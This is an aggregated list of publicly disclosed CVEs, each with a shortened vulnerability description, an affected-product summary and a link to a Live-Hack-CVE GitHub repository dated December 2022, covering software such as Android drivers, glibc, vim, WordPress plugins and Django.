**remap_pfn_range' here may map out of size kernel memory (for example, may map the kernel area), and because the 'vma->vm_page_prot' can also be controlled by userspace, so userspace may map the kernel area to be writable, which is easy to be exploitedProduct: AndroidVersions: Android SoCAndroid ID: A-233972091 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20239](https://github.com/Live-Hack-CVE/CVE-2022-20239) create time: 2022-12-28T13:00:43Z

**The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0594](https://github.com/Live-Hack-CVE/CVE-2022-0594) create time: 2022-12-28T13:00:40Z

**OpenHarmony-v3.1.2 and prior versions had a DOS vulnerability in distributedhardware_device_manager when joining a network. Network attakcers can send an abonormal packet when joining a network, cause a nullptr reference and device reboot. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43495](https://github.com/Live-Hack-CVE/CVE-2022-43495) create time: 2022-12-28T13:00:36Z

**OpenHarmony-v3.1.2 and prior versions had an Multiple path traversal vulnerability in appspawn and nwebspawn services. Local attackers can create arbitrary directories or escape application sandbox.If chained with other vulnerabilities it would allow an unprivileged process to gain full root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43451](https://github.com/Live-Hack-CVE/CVE-2022-43451) create time: 2022-12-28T13:00:33Z

**The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2002-20001](https://github.com/Live-Hack-CVE/CVE-2002-20001) create time: 2022-12-28T11:32:18Z

**The GetCode_ function in gd_gif_in.c in GD 2.1.1 and earlier, as used in PHP before 5.5.21 and 5.6.x before 5.6.5, allows remote attackers to cause a denial of service (buffer over-read and application crash) via a crafted GIF image that is improperly handled by the gdImageCreateFromGif function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9709](https://github.com/Live-Hack-CVE/CVE-2014-9709) create time: 2022-12-28T12:10:42Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple proto CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3282](https://github.com/Live-Hack-CVE/CVE-2018-3282) create time: 2022-12-28T12:13:07Z

**A vulnerability was found in business-central, as shipped in rhdm-7.5.1 and rhpam-7.5.1, where encoded passwords are stored in errai_security_context. The encoding used for storing the passwords is Base64, not an encryption algorithm, and any recovery of these passwords could lead to user passwords being exposed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14886](https://github.com/Live-Hack-CVE/CVE-2019-14886) create time: 2022-12-28T12:22:02Z

**A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14855](https://github.com/Live-Hack-CVE/CVE-2019-14855) create time: 2022-12-28T12:21:38Z

**A memory leak in the gs_can_open() function in drivers/net/can/usb/gs_usb.c in the Linux kernel before 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering usb_submit_urb() failures, aka CID-fb5be6a7b486. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19052](https://github.com/Live-Hack-CVE/CVE-2019-19052) create time: 2022-12-28T12:21:10Z

**A memory leak in the adis_update_scan_mode_burst() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-9c0530e898f3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19061](https://github.com/Live-Hack-CVE/CVE-2019-19061) create time: 2022-12-28T12:21:06Z

**A memory leak in the adis_update_scan_mode() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-ab612b1daf41. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19060](https://github.com/Live-Hack-CVE/CVE-2019-19060) create time: 2022-12-28T12:21:01Z

**The apt-cacher-ng package of openSUSE Leap 15.1 runs operations in user owned directory /run/apt-cacher-ng with root privileges. This can allow local attackers to influence the outcome of these operations. This issue affects: openSUSE Leap 15.1 apt-cacher-ng versions prior to 3.1-lp151.3.3.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18899](https://github.com/Live-Hack-CVE/CVE-2019-18899) create time: 2022-12-28T12:20:44Z

**This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before being being provided to the popen method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10800](https://github.com/Live-Hack-CVE/CVE-2019-10800) create time: 2022-12-28T12:20:33Z

**On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19126](https://github.com/Live-Hack-CVE/CVE-2019-19126) create time: 2022-12-28T12:20:27Z

**A memory leak in the cx23888_ir_probe() function in drivers/media/pci/cx23885/cx23888-ir.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering kfifo_alloc() failures, aka CID-a7b2df76b42b. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19054](https://github.com/Live-Hack-CVE/CVE-2019-19054) create time: 2022-12-28T12:20:23Z

**Lua 5.3.5 has a use-after-free in lua_upvaluejoin in lapi.c. For example, a crash outcome might be achieved by an attacker who is able to trigger a debug.upvaluejoin call in which the arguments have certain relationships. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6706](https://github.com/Live-Hack-CVE/CVE-2019-6706) create time: 2022-12-28T12:18:12Z

**Bundler prior to 2.1.0 uses a predictable path in /tmp/, created with insecure permissions as a storage location for gems, if locations under the user's home directory are not available. If Bundler is used in a scenario where the user does not have a writable home directory, an attacker could place malicious code in th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3881](https://github.com/Live-Hack-CVE/CVE-2019-3881) create time: 2022-12-28T12:12:07Z

**cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18218](https://github.com/Live-Hack-CVE/CVE-2019-18218) create time: 2022-12-28T11:32:32Z

**TigerVNC version prior to 1.10.1 is vulnerable to stack use-after-return, which occurs due to incorrect usage of stack memory in ZRLEDecoder. If decoding routine would throw an exception, ZRLEDecoder may try to access stack variable, which has been already freed during the process of stack unwinding. Exploitation of th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15691](https://github.com/Live-Hack-CVE/CVE-2019-15691) create time: 2022-12-28T11:30:00Z

**It has been found that in openshift-enterprise version 3.11 and openshift-enterprise versions 4.1 up to, including 4.3, multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1706](https://github.com/Live-Hack-CVE/CVE-2020-1706) create time: 2022-12-28T12:21:52Z

**A vulnerability was found in all openshift/postgresql-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/postgresql-apb. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1707](https://github.com/Live-Hack-CVE/CVE-2020-1707) create time: 2022-12-28T12:21:48Z

**A vulnerability was found in all openshift/mediawiki 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/mediawiki. An attacker with access to the container could use this flaw to modify /etc/passwd and escalate their privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1709](https://github.com/Live-Hack-CVE/CVE-2020-1709) create time: 2022-12-28T12:21:41Z

**A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10684](https://github.com/Live-Hack-CVE/CVE-2020-10684) create time: 2022-12-28T12:21:28Z

**jhead through 3.04 has a heap-based buffer over-read in Get32s when called from ProcessGpsInfo in gpsinfo.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6625](https://github.com/Live-Hack-CVE/CVE-2020-6625) create time: 2022-12-28T12:20:51Z

**A missing permission check in Jenkins Amazon EC2 Plugin 1.47 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2091](https://github.com/Live-Hack-CVE/CVE-2020-2091) create time: 2022-12-28T12:20:47Z

**jhead through 3.04 has a heap-based buffer over-read in process_DQT in jpgqguess.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6624](https://github.com/Live-Hack-CVE/CVE-2020-6624) create time: 2022-12-28T12:20:14Z

**A heap buffer overflow in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to execute arbitrary code, aka GHSL-2020-084. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12865](https://github.com/Live-Hack-CVE/CVE-2020-12865) create time: 2022-12-28T12:20:10Z

**An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12863](https://github.com/Live-Hack-CVE/CVE-2020-12863) create time: 2022-12-28T12:20:07Z

**A flaw was found in Red Hat Satellite 6 which allows privileged attacker to read cache files. These cache credentials could help attacker to gain complete control of the Satellite instance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14334](https://github.com/Live-Hack-CVE/CVE-2020-14334) create time: 2022-12-28T12:20:03Z

**An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-082. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12862](https://github.com/Live-Hack-CVE/CVE-2020-12862) create time: 2022-12-28T12:20:00Z

**Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24223](https://github.com/Live-Hack-CVE/CVE-2020-24223) create time: 2022-12-28T12:19:33Z

**Sympa before 6.2.56 allows privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10936](https://github.com/Live-Hack-CVE/CVE-2020-10936) create time: 2022-12-28T12:19:29Z

**In s::can moni::tools in versions below 4.2 an unauthenticated attacker could get any file from the device by path traversal in the camera-file module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12509](https://github.com/Live-Hack-CVE/CVE-2020-12509) create time: 2022-12-28T12:18:46Z

**debian/sympa.postinst for the Debian Sympa package before 6.2.40~dfsg-7 uses mode 4755 for sympa_newaliases-wrapper, whereas the intended permissions are mode 4750 (for access by the sympa group) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26932](https://github.com/Live-Hack-CVE/CVE-2020-26932) create time: 2022-12-28T12:17:26Z

**A flaw was found in WildFly Elytron version 1.11.3.Final and before. When using WildFly Elytron FORM authentication with a session ID in the URL, an attacker could perform a session fixation attack. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10714](https://github.com/Live-Hack-CVE/CVE-2020-10714) create time: 2022-12-28T12:17:23Z

**A flaw was found in the Linux kernel's implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10732](https://github.com/Live-Hack-CVE/CVE-2020-10732) create time: 2022-12-28T12:12:03Z

**A flaw was found in xorg-x11-server before 1.20.9. An integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14346](https://github.com/Live-Hack-CVE/CVE-2020-14346) create time: 2022-12-28T12:12:00Z

**A vulnerability was found in Wildfly's Enterprise Java Beans (EJB) versions shipped with Red Hat JBoss EAP 7, where SessionOpenInvocations are never removed from the remote InvocationTracker after a response is received in the EJB Client, as well as the server. This flaw allows an attacker to craft a denial of service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14307](https://github.com/Live-Hack-CVE/CVE-2020-14307) create time: 2022-12-28T12:11:52Z

**A flaw was found in libssh versions before 0.8.9 and before 0.9.4 in the way it handled AES-CTR (or DES ciphers if enabled) ciphers. The server or client could crash when the connection hasn't been fully initialized and the system tries to cleanup the ciphers when closing the connection. The biggest threat from this vu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1730](https://github.com/Live-Hack-CVE/CVE-2020-1730) create time: 2022-12-28T12:11:48Z

**A stack-based buffer overflow in the genptk_text component in genptk.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ptk format. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21675](https://github.com/Live-Hack-CVE/CVE-2020-21675) create time: 2022-12-28T11:37:45Z

**An information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35473](https://github.com/Live-Hack-CVE/CVE-2020-35473) create time: 2022-12-28T11:32:15Z

**A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3998](https://github.com/Live-Hack-CVE/CVE-2021-3998) create time: 2022-12-28T12:21:45Z

**A heap overflow flaw was found in libpngs' pngimage.c program. This flaw allows an attacker with local network access to pass a specially crafted PNG file to the pngimage utility, causing an application to crash, leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4214](https://github.com/Live-Hack-CVE/CVE-2021-4214) create time: 2022-12-28T12:21:32Z

**An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40345](https://github.com/Live-Hack-CVE/CVE-2021-40345) create time: 2022-12-28T12:19:36Z

**The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33574](https://github.com/Live-Hack-CVE/CVE-2021-33574) create time: 2022-12-28T12:18:05Z

**The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35942](https://github.com/Live-Hack-CVE/CVE-2021-35942) create time: 2022-12-28T12:18:02Z

**perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40303](https://github.com/Live-Hack-CVE/CVE-2021-40303) create time: 2022-12-28T12:10:46Z

**vim is vulnerable to Use of Uninitialized Variable CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3928](https://github.com/Live-Hack-CVE/CVE-2021-3928) create time: 2022-12-28T11:40:35Z

**vim is vulnerable to Out-of-bounds Read CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4193](https://github.com/Live-Hack-CVE/CVE-2021-4193) create time: 2022-12-28T11:40:12Z

**Grav is a file based Web-platform. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. The issue was addre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29440](https://github.com/Live-Hack-CVE/CVE-2021-29440) create time: 2022-12-28T11:40:08Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3974](https://github.com/Live-Hack-CVE/CVE-2021-3974) create time: 2022-12-28T11:40:04Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4019](https://github.com/Live-Hack-CVE/CVE-2021-4019) create time: 2022-12-28T11:39:59Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3984](https://github.com/Live-Hack-CVE/CVE-2021-3984) create time: 2022-12-28T11:39:55Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4069](https://github.com/Live-Hack-CVE/CVE-2021-4069) create time: 2022-12-28T11:39:52Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4192](https://github.com/Live-Hack-CVE/CVE-2021-4192) create time: 2022-12-28T11:39:48Z

**An issue was discovered in Smartstore (aka SmartStoreNET) through 4.1.1. Views/Boards/Partials/_ForumPost.cshtml does not call HtmlUtils.SanitizeHtml on certain text for a forum post. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32608](https://github.com/Live-Hack-CVE/CVE-2021-32608) create time: 2022-12-28T11:39:44Z

**An issue was discovered in Smartstore (aka SmartStoreNET) through 4.1.1. Views/PrivateMessages/View.cshtml does not call HtmlUtils.SanitizeHtml on a private message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32607](https://github.com/Live-Hack-CVE/CVE-2021-32607) create time: 2022-12-28T11:39:41Z

**net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31525](https://github.com/Live-Hack-CVE/CVE-2021-31525) create time: 2022-12-28T11:39:37Z

**The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23394](https://github.com/Live-Hack-CVE/CVE-2021-23394) create time: 2022-12-28T11:39:34Z

**This Gallery from files WordPress plugin through 1.6.0 gives the functionality of uploading images to the server. But filenames are not properly sanitized before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of CSRF check, the at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24349](https://github.com/Live-Hack-CVE/CVE-2021-24349) create time: 2022-12-28T11:39:07Z

**elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32682](https://github.com/Live-Hack-CVE/CVE-2021-32682) create time: 2022-12-28T11:39:03Z

**The WP LMS – Best WordPress LMS Plugin WordPress plugin through 1.1.2 does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24504](https://github.com/Live-Hack-CVE/CVE-2021-24504) create time: 2022-12-28T11:39:00Z

**In archive/zip in Go before 1.15.13 and 1.16.x before 1.16.5, a crafted file count (in an archive's header) can cause a NewReader or OpenReader panic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33196](https://github.com/Live-Hack-CVE/CVE-2021-33196) create time: 2022-12-28T11:38:37Z

**The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24347](https://github.com/Live-Hack-CVE/CVE-2021-24347) create time: 2022-12-28T11:38:33Z

**The sudoedit personality of Sudo before 1.9.5 may allow a local unprivileged user to perform arbitrary directory-existence tests by winning a sudo_edit.c race condition in replacing a user-controlled directory by a symlink to an arbitrary path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23239](https://github.com/Live-Hack-CVE/CVE-2021-23239) create time: 2022-12-28T11:37:49Z

**In _PMRLogicalOffsetToPhysicalOffset of the PowerVR kernel driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39661](https://github.com/Live-Hack-CVE/CVE-2021-39661) create time: 2022-12-28T11:35:15Z

**In MMU_UnmapPages of the PowerVR kernel driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-24382 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1050](https://github.com/Live-Hack-CVE/CVE-2021-1050) create time: 2022-12-28T11:33:02Z

**The daac_delete_booking_callback function, hooked to the daac_delete_booking AJAX action, takes the id POST parameter which is passed into the SQL statement without proper sanitisation, validation or escaping, leading to a SQL Injection issue. Furthermore, the ajax action is lacking any CSRF and capability check, makin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24555](https://github.com/Live-Hack-CVE/CVE-2021-24555) create time: 2022-12-28T11:32:00Z

**ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42205](https://github.com/Live-Hack-CVE/CVE-2021-42205) create time: 2022-12-28T11:30:44Z

**There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4160](https://github.com/Live-Hack-CVE/CVE-2021-4160) create time: 2022-12-28T11:30:29Z

**The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Mo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25094](https://github.com/Live-Hack-CVE/CVE-2021-25094) create time: 2022-12-28T11:29:49Z

**A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28347](https://github.com/Live-Hack-CVE/CVE-2022-28347) create time: 2022-12-28T12:21:59Z

**Azure Site Recovery Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-35774, CVE-2022-35775, CVE-2022-35780, CVE-2022-35781, CVE-2022-35782, CVE-2022-35783, CVE-2022-35784, CVE-2022-35785, CVE-2022-35786, CVE-2022-35787, CVE-2022-35788, CVE-2022-35789, CVE-2022-35790, CVE-2022-35791, CVE-2022-35 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35812](https://github.com/Live-Hack-CVE/CVE-2022-35812) create time: 2022-12-28T12:21:55Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33639](https://github.com/Live-Hack-CVE/CVE-2022-33639) create time: 2022-12-28T12:20:58Z

**Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38537](https://github.com/Live-Hack-CVE/CVE-2022-38537) create time: 2022-12-28T12:20:54Z

**A flaw was found in the VirGL virtual OpenGL renderer (virglrenderer). The virgl did not properly initialize memory when allocating a host-backed memory resource. A malicious guest could use this flaw to mmap from the guest kernel and read this uninitialized memory from the host, possibly leading to information disclos CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0175](https://github.com/Live-Hack-CVE/CVE-2022-0175) create time: 2022-12-28T12:20:41Z

**vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. Ther CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36067](https://github.com/Live-Hack-CVE/CVE-2022-36067) create time: 2022-12-28T12:20:37Z

**In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238177383References: Upstre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20409](https://github.com/Live-Hack-CVE/CVE-2022-20409) create time: 2022-12-28T12:20:30Z

**Cross-site Scripting (XSS) - DOM in GitHub repository jgraph/drawio prior to 20.5.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3873](https://github.com/Live-Hack-CVE/CVE-2022-3873) create time: 2022-12-28T12:19:26Z

**Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_quote. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43352](https://github.com/Live-Hack-CVE/CVE-2022-43352) create time: 2022-12-28T12:19:22Z

**Food Ordering Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /foms/place-order.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43046](https://github.com/Live-Hack-CVE/CVE-2022-43046) create time: 2022-12-28T12:19:19Z

**Sanitization Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43351](https://github.com/Live-Hack-CVE/CVE-2022-43351) create time: 2022-12-28T12:19:15Z

**Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_inquiry. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43350](https://github.com/Live-Hack-CVE/CVE-2022-43350) create time: 2022-12-28T12:19:12Z

**The Apache Pulsar C++ Client does not verify peer TLS certificates when making HTTPS calls for the OAuth2.0 Client Credential Flow, even when tlsAllowInsecureConnection is disabled via configuration. This vulnerability allows an attacker to perform a man in the middle attack and intercept and/or modify the GET request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33684](https://github.com/Live-Hack-CVE/CVE-2022-33684) create time: 2022-12-28T12:19:08Z

**An issue was discovered in Object First 1.0.7.712. The authorization service has a flow that allows getting access to the Web UI without knowing credentials. For signing, the JWT token uses a secret key that is generated through a function that doesn't produce cryptographically strong sequences. An attacker can predict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44796](https://github.com/Live-Hack-CVE/CVE-2022-44796) create time: 2022-12-28T12:19:04Z

**An issue was discovered in Object First 1.0.7.712. A flaw was found in the Web Service, which could lead to local information disclosure. The command that creates the URL for the support bundle uses an insecure RNG. That can lead to prediction of the generated URL. As a result, an attacker can get access to system logs CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44795](https://github.com/Live-Hack-CVE/CVE-2022-44795) create time: 2022-12-28T12:19:00Z

**An issue was discovered in Object First 1.0.7.712. Management protocol has a flow which allows a remote attacker to execute arbitrary Bash code with root privileges. The command that sets the hostname doesn't validate input parameters. As a result, arbitrary data goes directly to the Bash interpreter. An attacker would CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44794](https://github.com/Live-Hack-CVE/CVE-2022-44794) create time: 2022-12-28T12:18:56Z

